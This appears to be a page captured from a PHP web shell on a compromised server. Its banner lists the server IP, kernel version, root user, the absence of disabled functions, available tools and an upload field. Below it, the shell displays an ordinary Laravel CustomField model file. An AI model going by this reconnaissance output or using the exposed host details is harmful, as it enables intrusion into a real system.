| Server IP : 14.225.204.176 / Your IP : 216.73.216.169 Web Server : nginx/1.24.0 System : Linux nodejs-ybgk 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64 User : root ( 0) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/php/home-services/app/Models/ |
Upload File : |
<?php
/**
* File name: CustomField.php
* Last modified: 2019.08.27 at 15:37:12
* Author: SmarterVision - https://codecanyon.net/user/smartervision
* Copyright (c) 2021
*/
namespace App\Models;
use Eloquent as Model;
/**
* Class CustomField
* @package App\Models
* @version July 24, 2018, 9:13 pm UTC
*
* @property string name
* @property string type
* @property boolean disabled
* @property boolean required
* @property boolean in_table
* @property tinyInteger bootstrap_column
* @property tinyInteger order
* @property string custom_field_model
*/
class CustomField extends Model
{
public $table = 'custom_fields';
public $fillable = [
'name',
'type',
'values',
'disabled',
'required',
'in_table',
'bootstrap_column',
'order',
'custom_field_model'
];
/**
* The attributes that should be casted to native types.
*
* @var array
*/
protected $casts = [
'name' => 'string',
'type' => 'string',
'values' => 'array',
'disabled' => 'boolean',
'required' => 'boolean',
'in_table' => 'boolean',
'custom_field_model' => 'string'
];
/**
* Validation rules
*
* @var array
*/
public static $rules = [
'name' => 'required',
'type' => 'required',
'bootstrap_column' => 'min:1|max:12',
'custom_field_model' => 'required'
];
/**
* New Attributes
*
* @var array
*/
protected $appends = [
];
}